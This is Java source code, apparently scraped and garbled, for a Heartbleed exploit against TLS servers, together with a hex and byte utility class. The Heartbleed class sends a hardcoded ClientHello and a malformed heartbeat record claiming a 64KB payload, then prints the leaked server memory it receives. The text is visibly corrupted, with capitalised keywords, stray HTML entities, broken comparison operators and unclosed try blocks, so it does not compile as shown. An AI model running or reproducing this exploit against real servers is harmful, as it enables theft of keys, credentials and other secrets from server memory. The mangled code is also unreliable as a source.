Package com.jxy.web;
Import java.io.IOException;
Import Java.io.InputStream;
Import Java.io.OutputStream;
Import java.io.UnsupportedEncodingException;
Import Java.net.Socket;
Import java.net.UnknownHostException;
Import Com.jxy.tools.MyByte;
public class Heartbleed {
private static byte[] Hello = {(byte) 0x16, (Byte) 0x03, (byte) 0x02,
(byte) 0x00, (Byte) 0xdc, (Byte) 0x01, (Byte) 0x00, (byte) 0x00,
(byte) 0xd8, (Byte) 0x03, (Byte) 0x02, (Byte) 0x53, (byte) 0x43,
(byte) 0x5b, (Byte) 0x90, (Byte) 0x9d, (Byte) 0x9b, (byte) 0x72,
(byte) 0x0b, (Byte) 0xbc, (Byte) 0x0c, (Byte) 0xbc, (byte) 0x2b,
(byte) 0x92, (Byte) 0xa8, (Byte) 0x48, (Byte) 0x97, (byte) 0XCF,
(byte) 0xbd, (Byte) 0x39, (Byte) 0x04, (Byte) 0xcc, (byte) 0x16,
(byte) 0x0a, (Byte) 0x85, (Byte) 0x03, (Byte) 0x90, (byte) 0x9f,
(byte) 0x77, (Byte) 0x04, (Byte) 0x33, (Byte) 0xd4, (byte) 0xde,
(byte) 0x00, (Byte) 0x00, (Byte) 0x66, (Byte) 0xc0, (byte) 0x14,
(byte) 0xc0, (Byte) 0x0a, (Byte) 0xc0, (Byte) 0x22, (byte) 0xc0,
(byte) 0x21, (Byte) 0x00, (Byte) 0x39, (Byte) 0x00, (byte) 0x38,
(byte) 0x00, (Byte) 0x88, (Byte) 0x00, (Byte) 0x87, (byte) 0xc0,
(byte) 0x0f, (Byte) 0xc0, (Byte) 0x05, (Byte) 0x00, (byte) 0x35,
(byte) 0x00, (Byte) 0x84, (Byte) 0xc0, (Byte) 0x12, (byte) 0xc0,
(byte) 0x08, (Byte) 0xc0, (Byte) 0x1c, (Byte) 0xc0, (byte) 0x1b,
(byte) 0x00, (Byte) 0x16, (Byte) 0x00, (Byte) 0x13, (byte) 0xc0,
(byte) 0x0d, (Byte) 0xc0, (Byte) 0x03, (Byte) 0x00, (byte) 0x0a,
(byte) 0xc0, (Byte) 0x13, (Byte) 0xc0, (Byte) 0x09, (byte) 0xc0,
(byte) 0x1f, (Byte) 0xc0, (Byte) 0x1e, (Byte) 0x00, (byte) 0x33,
(byte) 0x00, (Byte) 0x32, (Byte) 0x00, (Byte) 0x9a, (byte) 0x00,
(byte) 0x99, (Byte) 0x00, (Byte) 0x45, (Byte) 0x00, (byte) 0x44,
(byte) 0xc0, (Byte) 0x0e, (Byte) 0xc0, (Byte) 0x04, (byte) 0x00,
(byte) 0x2f, (Byte) 0x00, (Byte) 0x96, (Byte) 0x00, (byte) 0x41,
(byte) 0xc0, (Byte) 0x11, (Byte) 0xc0, (Byte) 0x07, (byte) 0xc0,
(byte) 0x0c, (Byte) 0xc0, (Byte) 0x02, (Byte) 0x00, (byte) 0x05,
(byte) 0x00, (Byte) 0x04, (Byte) 0x00, (Byte) 0x15, (byte) 0x00,
(byte) 0x12, (Byte) 0x00, (Byte) 0x09, (Byte) 0x00, (byte) 0x14,
(byte) 0x00, (Byte) 0x11, (Byte) 0x00, (Byte) 0x08, (byte) 0x00,
(byte) 0x06, (Byte) 0x00, (Byte) 0x03, (Byte) 0x00, (byte) 0xFF,
(byte) 0x01, (Byte) 0x00, (Byte) 0x00, (Byte) 0x49, (byte) 0x00,
(byte) 0x0b, (Byte) 0x00, (Byte) 0x04, (Byte) 0x03, (byte) 0x00,
(byte) 0x01, (Byte) 0x02, (Byte) 0x00, (Byte) 0x0a, (byte) 0x00,
(byte) 0x34, (Byte) 0x00, (Byte) 0x32, (Byte) 0x00, (byte) 0x0e,
(byte) 0x00, (Byte) 0x0d, (Byte) 0x00, (Byte) 0x19, (byte) 0x00,
(byte) 0x0b, (Byte) 0x00, (Byte) 0x0c, (Byte) 0x00, (byte) 0x18,
(byte) 0x00, (Byte) 0x09, (Byte) 0x00, (Byte) 0x0a, (byte) 0x00,
(byte) 0x16, (Byte) 0x00, (Byte) 0x17, (Byte) 0x00, (byte) 0x08,
(byte) 0x00, (Byte) 0x06, (Byte) 0x00, (Byte) 0x07, (byte) 0x00,
(byte) 0x14, (Byte) 0x00, (Byte) 0x15, (Byte) 0x00, (byte) 0x04,
(byte) 0x00, (Byte) 0x05, (Byte) 0x00, (Byte) 0x12, (byte) 0x00,
(byte) 0x13, (Byte) 0x00, (Byte) 0x01, (Byte) 0x00, (byte) 0x02,
(byte) 0x00, (Byte) 0x03, (Byte) 0x00, (Byte) 0x0f, (byte) 0x00,
(byte) 0x10, (Byte) 0x00, (Byte) 0x11, (Byte) 0x00, (byte) 0x23,
(byte) 0x00, (Byte) 0x00, (Byte) 0x00, (Byte) 0x0f, (byte) 0x00,
(byte) 0x01, (byte) 0x01};
private static byte[] bleed = {(byte) 0x18, (Byte) 0x03, (byte) 0x02,
(byte) 0x00, (Byte) 0x03, (Byte) 0x01, (Byte) 0xFF, (byte) 0xFF};
private static byte[] tmp;
private static byte[] pay;
/**
* Ssl3_rt_change_cipher_spec 20
* Ssl3_rt_alert 21
* Ssl3_rt_handshake 22
* Ssl3_rt_application_data 23
* Tls1_rt_heartbeat 24
*
* @param args
* @throws Exception
*/
public static void Main (string[] args) {
Attack ("The host to own test", 465);
System.exit (0);
}
public static Boolean attack (String host, int port) {
system.out.println ("Start connecting ...");
socket Socket = null;
try {
socket = new Socket (host, port);
 &NBSP} catch (Unknownhostexception e) {
system.out.println ("Unknown host.");
return false;
} catch (IOException e) {
system.out.println ("Access to host failed.");
return false;
}
outputstream out = null;
try {
out = Socket.getoutputstream ();
 &NBSP} catch (IOException e) {
system.out.println ("Get output stream failed.");
return false;
}
inputstream in = null;
try {
in = Socket.getinputstream ();
 &NBSP} catch (IOException e) {
system.out.println ("Get input stream failed.");
return false;
}
SYSTEM.OUT.PRINTLN ("Send client Heartbeat pack ...");
try {
Out.write (hello);
catch (IOException e) {
System.out.println ("Send heartbeat packet failed.");
return false;
}
System.out.println ("Wait for server Heartbeat pack ...");
while (true) {
TMP = GetData (in, 5);
if (tmp[0] = = 0) {
SYSTEM.OUT.PRINTLN ("The server did not return the heartbeat pack and closed the connection.");
return false;
}
Analysehead (TMP);
int len = (int) Mybyte.hexstring2long (mybyte
. bytetohexstring (Tmp[3]) + mybyte.bytetohexstring (tmp[4));
Pay = GetData (in, Len);
if (tmp[0] = && pay[0] = = 0x0e) {
System.out.println ("Find to return to the normal heartbeat pack.") ");
Break
}
}
System.out.println ("Send heartbeat heartbeat Packet ...");
try {
Out.write (bleed);
catch (IOException e) {
System.out.println ("Send heartbeat heartbeat packet failed.");
return false;
}
try {
Out.write (bleed);
catch (IOException e) {
System.out.println ("Send heartbeat heartbeat packet failed.");
return false;
}
while (true) {
TMP = GetData (in, 5);
int len = (int) Mybyte.hexstring2long (mybyte
. bytetohexstring (Tmp[3]) + mybyte.bytetohexstring (tmp[4));
if (tmp[0] = = 0) {
System.out.println ("No heartbeat return received, server does not look vulnerable");
return false;
}
if (tmp[0] = = 24) {
System.out.println ("Received Heartbeat return:");
int count=0;//Length Count
for (int i = 0; i < 4; i++) {//Read 4 times, all read out 64KB
Pay = GetData (in, Len);
Count+=pay.length;
System.out.print (Hexdump (pay));
}
System.out.println ("\ n data Length:" + count);
if (Len > 3) {
System.out
. println ("Warning: The server returned more data than it was originally-the server is vulnerable!");
} else {
System.out
. println ("Server returns malformed heartbeat, no other additional data returned");
}
Break
}
if (tmp[0] = = 21) {
System.out.println ("Received warning:");
System.out.println (Hexdump (pay));
SYSTEM.OUT.PRINTLN ("server returns an error, does not appear to be vulnerable");
Break
}
}
try {
Out.close ();
In.close ();
catch (IOException e) {
System.out.println ("Turn off input/output stream exception");
}
return true;
}
public static byte[] GetData (inputstream in, int lenth) {
byte[] t = new Byte[lenth];
try {
In.read (t);
catch (IOException e) {
SYSTEM.OUT.PRINTLN ("Accept data Error");
}
return t;
}
public static String Hexdump (byte[] pay) {
String s = "";
try {
s = new String (Pay, "GB2312");
catch (Unsupportedencodingexception e) {
System.out.println ("Unknown Code");
}
return s;
}
public static void Analysehead (byte[] tmp) {
System.out.print ("received message:");
System.out.print ("type:" + tmp[0] + "T");
System.out.print ("version:" + mybyte.bytetohexstring (tmp[1))
+ mybyte.bytetohexstring (tmp[2]) + "T");
System.out.println ("Length:"
+ Mybyte.hexstring2long (mybyte.bytetohexstring (tmp[3))
+ mybyte.bytetohexstring (tmp[4]));
}
}
Package com.jxy.tools;
/**
* 16 conversion between the value of the binary and the String/byte
* */
public class MyByte {
/**
* Converts a string to a hexadecimal string
*
* @param String
* str ASCII string to be converted
* @return String separated by a space between each byte, such as: [6C 6B]
*/
public static string Str2hexstr (String str) {
Char[] chars = "0123456789ABCDEF". ToCharArray ();
StringBuilder sb = new StringBuilder ("");
byte[] bs = Str.getbytes ();
int bit;
for (int i = 0; i < bs.length; i++) {
bit = (Bs[i] & 0x0f0) >> 4;
Sb.append (Chars[bit]);
bit = Bs[i] & 0x0f;
Sb.append (Chars[bit]);
Sb.append (");
}
Return sb.tostring (). Trim ();
}
/**
* 16 in-process conversion string
*
* @param String
* str byte string (no delimiter between byte such as: [616C6B])
* String corresponding to @return string
*/
public static string Hexstr2str (String hexstr) {
String str = "0123456789ABCDEF";
char[] Hexs = Hexstr.tochararray ();
byte[] bytes = new Byte[hexstr.length ()/2];
int n;
for (int i = 0; i < bytes.length; i++) {
n = str.indexof (hexs[2 * i]) * 16;
n + = str.indexof (hexs[2 * i + 1]);
Bytes[i] = (byte) (n & 0xff);
}
return new String (bytes);
}
/**
* String literals to Unicode string
*
* @param String
* StrText Full-angle string
* @return String No separator between each Unicode
* @throws Exception
*/
public static string Strtounicode (String strText) throws Exception {
char c;
StringBuilder str = new StringBuilder ();
int INTASC;
String Strhex;
for (int i = 0; i < strtext.length (); i++) {
c = Strtext.charat (i);
INTASC = (int) c;
Strhex = integer.tohexstring (INTASC);
if (Intasc > 128)
Str.append ("\\u" + strhex);
Else
Low in front, 00.
Str.append ("\\u00" + strhex);
}
return str.tostring ();
}
/**
* Unicode string to Strings
*
* @param String
* Hex 16 Binary Value string (one Unicode to 2byte)
* @return String Full-angle string
*/
public static string unicodetostring (String hex) {
int t = hex.length ()/6;
StringBuilder str = new StringBuilder ();
for (int i = 0; i < T; i++) {
String s = hex.substring (i * 6, (i + 1) * 6);
High level needs to be up to 00 and turn.
String S1 = s.substring (2, 4) + "00";
Low Direct turn
String s2 = s.substring (4);
Converts a 16-binary string to an int
int n = integer.valueof (S1,) + integer.valueof (S2, 16);
convert int to Characters
char[] chars = Character.tochars (n);
Str.append (New String (chars));
}
return str.tostring ();
}
/**
* Merge two byte arrays
*
* @param pbytea
* @param pbyteb
* @return */
public static byte[] Getmergebytes (byte[] Pbytea, byte[] pbyteb) {
int aCount = pByte A.length;
int bcount = pbyteb.length;
byte[] B = new Byte[acount + Bcount];
for (int i = 0; i < acount; i++) {
b[i] = pbytea[i];
&NBSP;&NBSP}
for (int i = 0; i < Bcount; i++) {
b[acount + i] = pbyteb[i];
&NBSP;&NBSP}
return b;
.}
/**
* Intercepting byte data
*
* @param b
* is a byte array
* @param j
* is size
* @return
*/
public static byte[] Cutoutbyte (byte[] b, int j) {
if (B.length = = 0 | | | j = = 0) {
return null;
&NBSP;&NBSP}
byte[] tmp = new BYTE[J];
for (int i = 0; i < J; i++) {
tmp[i] = b[i];
&NBSP;&NBSP}
return tmp;
.}
/**
* 16 binary string convert byte array
*
* @param hexstr
* String 16 Feed string
* @return byte[] byte array
*/
public static byte[] Hexstring2bytes (String hexstr) {
Byte[] B = new Byte[hexstr.length ()/2];
int j = 0;
for (int i = 0; i < b.length; i++) {
char C0 = Hexstr.charat (j + +);
Char C1 = Hexstr.charat (j + +);
B[i] = (byte) (Parse (C0) << 4) | Parse (c1));
}
return b;
}
private static int Parse (char c) {
if (c >= ' a ')
Return (C-' a ' +) & 0x0f;
if (c >= ' A ')
Return (C-' A ' +) & 0x0f;
Return (C-' 0 ') & 0x0f;
}
/**
* Byte is converted to a hexadecimal string, if it is less than 9, padded with 0
*
* @param b
* @return
*/
public static String bytetohexstring (Byte b) {
String stmp = integer.tohexstring (b & 0xFF);
Stmp = (stmp.length () = = 1)? "0" + stmp:stmp;
return Stmp.touppercase ();
}
/**
* Convert byte to int
*
* @param b
* @return
*/
public static int Bytetoint (byte b) {
return integer.valueof (b);
}
/**
* Bytes converted to hexadecimal string
*
* @param byte[] b byte array
* @return String separated by a space between each byte
*/
public static String bytetohexstring (byte[] b) {
String stmp = "";
StringBuilder sb = new StringBuilder ("");
for (byte c:b) {
Stmp = Integer.tohexstring (c & 0xFF);//With budget, remove the complement of byte to int
Sb.append ((stmp.length () = 1)? "0" + stmp:stmp);/is a word filled with zero
Sb.append ("");/per digit data separated by spaces
}
Return sb.tostring (). toUpperCase (). Trim ();//capitalize and remove trailing spaces
}
public static long Hexstring2long (String hexstr) {
Long sum=0;
int Length=hexstr.length ();
for (int i = 0; i < length; i++) {
Sum+=parse (Hexstr.charat (i)) *math.pow (16,length-i-1);
}
return sum;
}
}